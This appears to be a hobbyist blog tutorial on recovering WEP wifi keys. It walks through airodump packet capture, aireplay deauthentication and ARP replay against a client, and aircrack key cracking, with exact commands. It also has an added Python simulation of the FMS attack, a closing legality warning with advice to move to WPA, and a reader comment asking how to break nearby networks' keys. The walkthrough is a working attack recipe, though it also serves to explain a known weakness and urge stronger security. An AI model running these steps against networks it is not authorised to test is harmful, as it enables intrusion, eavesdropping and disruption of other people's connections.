Having dealt with faking MAC addresses in a previous article, the Poorhouse heard on the grapevine that it wasn't so difficult to beat the other half of bog-standard wireless network security either: the encryption key.
When a wireless network client talks to an access point (for instance a router) it transmits packets of data. Because those packets fly through the air for all to see, a nefarious individual sitting nearby could intercept them, see what the network user is up to, or sneakily communicate with the network, use its Internet connection and so on. Wifi networks with any semblance of security therefore encrypt their traffic so that a passer-by can neither read the packets nor join in. Typically this is done with "Wired Equivalent Privacy" (WEP), which is often the only option open to users of older or cheaper equipment. The Poorhouse knows for sure that home users, and perhaps more worryingly business users, use it regularly.
To participate in a WEP session you need the key, which tells the computer how to encrypt and decrypt the data it sends and receives. Once you have it you can log on, read network traffic and so on (barring any further access controls or encryption layered on top). So, if you have forgotten your WEP key, or are an evil hax0r, how would you get it?
Well, it turns out that WEP isn't the most secure of encryption systems. Each packet is encrypted with RC4 under a key made of the shared secret plus a 24-bit "initialisation vector" (IV) that is sent in the clear, and for certain IVs the encrypted packet leaks a little information about the secret key. By intercepting enough communications between a client and an access point - and "enough" is a feasible amount to get in the real world, even though at this point none of them can be understood - you can gather sufficient packets with distinct IVs that the key can be swiftly worked out from them in your own time.
To do this it is often better to work in Linux rather than, for example, Windows, because under Linux drivers (if you can find one for your card) wifi cards tend to be able to enter more useful modes, especially "monitor" mode, in which the card can read packets from any wifi conversation in range rather than just the network it is connected to. Potential tools of the trade include the Aircrack suite. The Poorhouse decided to "crack" its own test network to see if it was as relatively easy as the rumours say.
The Aircrack suite contains a program to sniff and record packets as they fly through the air until you have enough to work out the key from (airodump), one that can inject packets to speed the process up if needed (aireplay), and one that works out the key from the recorded packets (aircrack). It contains other tools too, but the Poorhouse's network was defeated by just these three.
A brief guide to how it was done follows. In this case, imagine that the network's SSID was NETWORK1 and it was running via a wireless router with a MAC address of 11:22:33:44:55:66 on wifi channel 6. Furthermore, there was a legitimate client computer accessing it at the time, with a MAC address of 77:88:99:AA:BB:CC. You can find your target's SSID, channel and the relevant MAC addresses remotely using the methods mentioned in the faking MAC address article, for instance with software such as Kismet. In Kismet almost all of this information is available by selecting the relevant network in the list and hitting enter; the rest can be had by hitting shift-C to bring up info on the clients accessing that network.
The evil hax0r in question was in a nearby room, playing with Aircrack on a bog standard laptop equipped with a bog standard wifi card.
You want to be working in Linux with, say, the hostap drivers loaded for your wifi card. The first thing to do was to put the laptop's wifi card into monitor mode and lock it onto the correct channel so that it could intercept packets from networks it was not connected to. The wifi card was known to Linux as wlan0 (to find this out, type "ifconfig"). This was done via:
iwconfig wlan0 mode monitor
iwconfig wlan0 channel 6
Airodump: Catching packets
Then airodump was started in order to record the packets flying around the network. We need to record lots of packets, so make sure you have enough disk space to cope - the Poorhouse's file reached a little under 200 megabytes.
airodump wlan0 capturefile 11:22:33:44:55:66
where capturefile is the name of the file you want to store the packet information in.
You will now see on screen some information about the access point and any clients accessing it. There will be a count of packets, which should be going up if the network is in use. Note that it is encrypted data packets that count: beacons and other management traffic carry no encrypted payload, and what aircrack really needs is a large number of packets with distinct IVs. Internet sources suggest you need 700,000 - 1,000,000 packets to safely crack a 128-bit WEP key. However the Poorhouse found it was possible to do it with not many more than 400,000. Sit and wait for this count to go up to that sort of level.
Aireplay: Arping on
This could take a fair while (several hours, for instance) if the network's not very busy. Why not help it along? Aireplay contains several features that will do that job. Aireplay attack mode 0 deauthenticates clients from an access point. To the legitimate user of the network it will appear that the connection cut out for a moment; some less stable clients may even crash, be warned. The point of doing this is that when the client computers automatically re-authenticate (so they can use the network again), some interesting packets are sent. These are ARP packets, which are involved in translating the IP addresses given out by the router (such as 124.126.127.178) to the MAC address of a specific client computer (77:88:99:AA:BB:CC). An ARP request has a fixed, recognisable size, so it can be picked out of the traffic even though its contents are encrypted.
Aireplay attack mode 3 listens out for these packets and, when it finds one, replays it to the access point at high speed as though it came from the client computer (the -h parameter spoofs the client's MAC, which is also why MAC filtering on the router is no obstacle). WEP has no protection against replayed packets, so the access point rebroadcasts every copy, and the target host answers each one, as freshly encrypted packets carrying new IVs, and the packet count you are recording in Airodump rises very quickly. The procedure to do this (sending 10 deauthentication packets) was as follows - ensure Airodump is still running to collect packets:
aireplay -0 10 -a 11:22:33:44:55:66 -c 77:88:99:AA:BB:CC wlan0
aireplay -3 -b 11:22:33:44:55:66 -h 77:88:99:AA:BB:CC wlan0
You should see Aireplay looking for, and soon finding and replaying, ARP packets at high speed. When this happens the packet count in Airodump should go up quickly as well. Continue until you have enough packets to attempt to crack the key.
Success: the t0p s3cr3t c0De revealed!
When you have enough packets you can stop Airodump and Aireplay. You then need to use Aircrack to work out the key from the collection of packets you have saved.
aircrack -f 3 -m 11:22:33:44:55:66 -n 128 capturefile
The -m parameter is the MAC address of the access point whose packets should be used, and -n is the length of the key, in this case 128 bits. (Confusingly, the advertised lengths include the 24-bit IV: a "64-bit" key is really 40 secret bits and a "128-bit" key 104.) You can try the various options (64, 128, 152, 256) if you get no success. The -f parameter is a "fudge factor", which defaults to two: it controls how many of the most likely candidate values aircrack will try for each byte of the key. The higher the fudge factor, the longer the crack will likely take, but the more chance it has of finding the key. The Poorhouse found a fudge factor of 3 broke the WEP key in question, but had more packets been captured (for instance the recommended 700,000) it probably wouldn't have been needed. Higher fudge factor included, the crack took no more than a handful of minutes.
If all goes well, Aircrack will test various candidate keys based on the packet information gathered with Airodump, and will print the actual WEP key at the bottom of its output.
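The statistical weakness behind all of this, as an added example that is not part of the original article or of the Aircrack suite: a small Python simulation of WEP (RC4 keyed with IV || secret key, CRC-32 ICV on each packet) and of the FMS attack that early versions of aircrack were built on. The capture is constructed in the code rather than sniffed; the key, the IVs and the packet contents are this example's own choices. The `fudge` parameter plays the role of aircrack's -f: how many of the most-voted candidates per key byte are tried, with each complete candidate key confirmed the way aircrack confirms it, by decrypting a packet and checking its ICV.

```python
import random
import zlib
from collections import Counter

# Every LLC/SNAP-encapsulated 802.11 data frame starts with these bytes (here: ARP),
# which is the known plaintext the FMS attack relies on.
SNAP_HEADER = bytes.fromhex("aaaa030000000806")


def rc4_ksa(key):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv, key, payload):
    """One WEP frame body: the 3-byte IV goes out in the clear, then RC4 keyed with
    IV || secret key encrypts payload || CRC-32 ICV."""
    body = payload + zlib.crc32(payload).to_bytes(4, "little")
    ks = rc4_keystream(bytes(iv) + bytes(key), len(body))
    return bytes(iv), bytes(a ^ b for a, b in zip(body, ks))


def icv_ok(key, iv, ct):
    """Decrypt and check the ICV: what the access point does on receipt, and what
    aircrack does to confirm a candidate key."""
    ks = rc4_keystream(bytes(iv) + bytes(key), len(ct))
    body = bytes(a ^ b for a, b in zip(ct, ks))
    return zlib.crc32(body[:-4]).to_bytes(4, "little") == body[-4:]


def make_capture(key, weak_per_byte=256, extra_random_ivs=500, seed=7):
    """Constructed stand-in for an airodump capture: a list of (iv, ciphertext).
    A real capture reaches the weak IVs (b+3, 255, x) by sheer volume or by ARP
    replay; here they are generated directly and mixed with ordinary random IVs."""
    rng = random.Random(seed)
    ivs = [(b + 3, 255, x) for b in range(len(key)) for x in range(weak_per_byte)]
    ivs += [tuple(rng.randrange(256) for _ in range(3)) for _ in range(extra_random_ivs)]
    rng.shuffle(ivs)
    return [wep_encrypt(iv, key, SNAP_HEADER) for iv in ivs]


def fms_votes(capture, known):
    """FMS attack on secret-key byte number len(known): simulate the RC4 key
    schedule as far as the known bytes allow and, for 'resolved' IVs, turn the
    first keystream byte into a vote for the next key byte."""
    pos = len(known) + 3  # position of the attacked byte in the RC4 key (after the IV)
    tally = Counter()
    for iv, ct in capture:
        k = list(iv) + list(known)
        S = list(range(256))
        j = 0
        for i in range(pos):  # KSA steps that use only bytes we already know
            j = (j + S[i] + k[i]) & 0xFF
            S[i], S[j] = S[j], S[i]
        s1 = S[1]
        if s1 >= pos or (s1 + S[s1]) & 0xFF != pos:
            continue  # this IV is not resolved for this byte: no information
        z = ct[0] ^ SNAP_HEADER[0]  # first keystream byte, thanks to the known plaintext
        # If S[0], S[1] and S[pos] survive the rest of the KSA (about 5% of the time),
        # z == S[j + S[pos] + K[pos]], so this vote is the true key byte.
        tally[(S.index(z) - j - S[pos]) & 0xFF] += 1
    return tally


def recover_key(capture, key_len, fudge=3, known=()):
    """Depth-first search over the top-'fudge' candidates for each byte (aircrack's -f),
    confirming each complete candidate key against a real packet's ICV.
    Returns the key as bytes, or None if nothing within the fudge factor works."""
    if len(known) == key_len:
        iv, ct = capture[0]
        return bytes(known) if icv_ok(known, iv, ct) else None
    for cand, _ in fms_votes(capture, known).most_common(fudge):
        found = recover_key(capture, key_len, fudge, known + (cand,))
        if found is not None:
            return found
    return None


if __name__ == "__main__":
    KEY = bytes.fromhex("1a2b3c4d5e")  # 40-bit ("64-bit") WEP key chosen for the demo
    cap = make_capture(KEY)
    found = recover_key(cap, 5, fudge=3)
    print(f"{len(cap)} packets 'captured'; recovered key:",
          found.hex() if found else "not found within the fudge factor")
```

With 256 weak IVs per key byte roughly 5% of the votes for each byte are correct and the rest are spread almost uniformly over the other 255 values, so the right byte wins by a wide margin and the 40-bit key comes back in a second or two. Lower `weak_per_byte` and the wrong candidates creep up the rankings, which is exactly the situation a larger fudge factor is for; the ICV check is what stops a wrong candidate from being reported as "the" key.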
With this key, and the ability to fake your MAC, you can almost certainly get into any network that relies on MAC filtering and WEP, see what they're up to, connect to their computers and use their resources. Or you could just use your neighbour's wireless Internet, if you are that desperate. Be warned though that using these techniques to access any network you don't have permission for is very naughty, and indeed most probably highly illegal. Don't do it!
Network owners: be aware, therefore, that MAC filtering and WEP are not good enough security if you're up to anything important. Many modern-ish systems can do WPA encryption instead of WEP, and at present this is a more secure system. Nothing is perfect, and a WPA pre-shared key is only as strong as the passphrase behind it, but WPA doesn't have the specific weaknesses of WEP, so if you get the chance use it (with a long, random passphrase) instead. If your equipment can't handle that (many older or cheaper bits of kit can't), then make sure anything that needs serious security over your wifi network is encrypted in some other, more hardcore way on your computer (a VPN or SSH, for instance) before the packets are sent to all and sundry.
Thanks to Wirelessdefence, Tom's Networking, Slax and the tools mentioned above for containing the knowledge to guide this mission to successful completion.

Comments
WEP Code breaking
Hi
I'm staying with a friend at the mo who doesn't have a phone line, but I can see 3 security-enabled wifi signals locally.
Can anyone tell me how to break the WEP keys required to sign on and use these services?
Thx
Anon
Isn't this illegal?
Yes it is. Find out first if you have due permission.